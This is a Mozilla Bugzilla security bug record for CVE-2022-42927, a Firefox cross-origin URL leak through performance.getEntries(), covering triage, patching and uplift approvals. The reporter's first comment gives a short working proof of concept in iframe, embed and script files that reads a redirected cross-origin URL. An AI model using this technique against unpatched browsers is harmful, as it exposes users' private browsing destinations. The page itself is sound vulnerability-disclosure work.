Closed Bug 1789128 (CVE-2022-42927) Opened 2 years ago Closed 2 years ago

A Variant of bug id 1487964: Cross-Origin URL Steal is possible using performance.getEntries()

Categories

(Core :: DOM: Performance, defect)

Product:
Core
Component:
DOM: Performance
Type:
defect

Tracking

()

Status:
RESOLVED FIXED
Milestone:
107 Branch
Tracking Flags:
Tracking Status
firefox-esr91 --- wontfix
firefox-esr102 106+ fixed
firefox104 --- wontfix
firefox105 --- wontfix
firefox106 + fixed
firefox107 --- fixed

People

(Reporter: proof131072, Assigned: valentin)

References

(Regression,
URL
)

Details

(Keywords: csectype-sop, regression, sec-high, Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main106+][adv-esr102.4+])

Attachments

(3 files)

Bug 1789128 - tests r=#necko,smaug!
(deleted), text/x-phabricator-request
Details
Bug 1789128 - Always call LoadInfo::GetPerformanceStorage() r=#necko,smaug!
(deleted), text/x-phabricator-request
pascalc
: approval-mozilla-beta+
RyanVM
: approval-mozilla-esr102+
tjr
: sec-approval+
Details
advisory.txt
(deleted), text/plain
Details

We are able to steal Cross-Origin URL when we frame the page. This is a variant of https://bugzilla.mozilla.org/show_bug.cgi?id=1487964

PoC:

framescript.php:

<iframe src="http://pwning.click/ffembed.php"/></iframe>

ffembed.php:

<embed src="/ffscript.php">
<script>
setTimeout(function(){alert(performance.getEntriesByType("resource")[1].name)},3000);
</script>

ffscript.php:

<script>location="https://www.bing.com/search?q=test"</script>

Test on: http://pwning.click/framescript.php

I tested on Latest Firefox Nightly for Windows.

Flags: sec-bounty?
Group: firefox-core-security → dom-core-security
Component: Security → DOM: Navigation
Product: Firefox → Core
Component: DOM: Navigation → DOM: Performance

This regressed starting with bug 1732358 which enabled fission, but the actual bug was introduced in bug 1658097.

Regressed by: 1732358, 1658097
Assignee: nobody → valentin.gosu

We're building the final beta of the Fx105 cycle today. Let's shoot for getting this fix into the next cycle.

status-firefox105: affectedwontfix
tracking-firefox106: --- → +
tracking-firefox-esr102: --- → 106+

Comment on attachment 9293697 [details]
Bug 1789128 - Always call LoadInfo::GetPerformanceStorage() r=#necko,smaug!

Security Approval Request

  • How easily could an exploit be constructed based on the patch?: Relatively easily. Anyone with access or knowledge of previous vulnerabilities would be able to figure out what's wrong.
  • Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?: Yes
  • Which older supported branches are affected by this flaw?: all
  • If not all supported branches, which bug introduced the flaw?: None
  • Do you have backports for the affected branches?: Yes
  • If not, how different, hard to create, and risky will they be?: Easy
  • How likely is this patch to cause regressions; how much testing does it need?: Low risk of functional regressions.
    There is a small risk of perf regressions on pages with iframes since now we're serializing the entire loadInfo, but that's easily fixable if necessary.
  • Is Android affected?: Yes
Attachment #9293697 - Flags: sec-approval?
Group: dom-core-security → layout-core-security

Comment on attachment 9293697 [details]
Bug 1789128 - Always call LoadInfo::GetPerformanceStorage() r=#necko,smaug!

Approved to land and uplift

Attachment #9293697 - Flags: sec-approval? → sec-approval+
Whiteboard: [reporter-external] [client-bounty-form] [verif?] → [reporter-external] [client-bounty-form] [verif?][reminder-test 2022-11-01]

Comment on attachment 9293697 [details]
Bug 1789128 - Always call LoadInfo::GetPerformanceStorage() r=#necko,smaug!

Beta/Release Uplift Approval Request

  • User impact if declined: Cross origin leak of information using the performance API
  • Is this code covered by automated tests?: Yes
  • Has the fix been verified in Nightly?: No
  • Needs manual test from QE?: No
  • If yes, steps to reproduce: (we have automated testing)
  • List of other uplifts needed: None
  • Risk to taking this patch: Low
  • Why is the change risky/not risky? (and alternatives if risky): Fixes a regression. The fix is simple.
    Small chance for performance regression (in testcases with lots of iframes) since we now serialize the entire loadinfo instead of just the innerWindowID.
  • String changes made/needed:
  • Is Android affected?: Yes

ESR Uplift Approval Request

  • If this is not a sec:{high,crit} bug, please state case for ESR consideration:
  • User impact if declined:
  • Fix Landed on Version: 107
  • Risk to taking this patch: Low
  • Why is the change risky/not risky? (and alternatives if risky):
Attachment #9293697 - Flags: approval-mozilla-esr102?
Attachment #9293697 - Flags: approval-mozilla-beta?

Always call LoadInfo::GetPerformanceStorage() r=smaug
https://hg.mozilla.org/integration/autoland/rev/ea40a2dfd016ce3b2af27e2b1e74f8f8ef72b79f
https://hg.mozilla.org/mozilla-central/rev/ea40a2dfd016

Group: layout-core-security → core-security-release
Status: NEW → RESOLVED
Closed: 2 years ago
status-firefox107: --- → fixed
Resolution: --- → FIXED
Target Milestone: --- → 107 Branch

Comment on attachment 9293697 [details]
Bug 1789128 - Always call LoadInfo::GetPerformanceStorage() r=#necko,smaug!

Approved for 106.0b3, thanks.

Attachment #9293697 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Flags: qe-verify-
Whiteboard: [reporter-external] [client-bounty-form] [verif?][reminder-test 2022-11-01] → [reporter-external] [client-bounty-form] [verif?][reminder-test 2022-11-01][post-critsmash-triage]

Comment on attachment 9293697 [details]
Bug 1789128 - Always call LoadInfo::GetPerformanceStorage() r=#necko,smaug!

Approved for 102.4esr.

Attachment #9293697 - Flags: approval-mozilla-esr102? → approval-mozilla-esr102+
Regressions: 1793521
Flags: sec-bounty? → sec-bounty+
Whiteboard: [reporter-external] [client-bounty-form] [verif?][reminder-test 2022-11-01][post-critsmash-triage] → [reporter-external] [client-bounty-form] [verif?][reminder-test 2022-11-01][post-critsmash-triage][adv-main106+]
Whiteboard: [reporter-external] [client-bounty-form] [verif?][reminder-test 2022-11-01][post-critsmash-triage][adv-main106+] → [reporter-external] [client-bounty-form] [verif?][reminder-test 2022-11-01][post-critsmash-triage][adv-main106+][adv-esr102.4+]
Attached file advisory.txt (deleted) —
Alias: CVE-2022-42927
No longer regressions: 1793521
Group: core-security-release

3 months ago, Tom Ritter [:tjr] placed a reminder on the bug using the whiteboard tag [reminder-test 2022-11-01] .

valentin, please refer to the original comment to better understand the reason for the reminder.

Flags: needinfo?(valentin.gosu)
Whiteboard: [reporter-external] [client-bounty-form] [verif?][reminder-test 2022-11-01][post-critsmash-triage][adv-main106+][adv-esr102.4+] → [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main106+][adv-esr102.4+]
Flags: needinfo?(valentin.gosu)
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: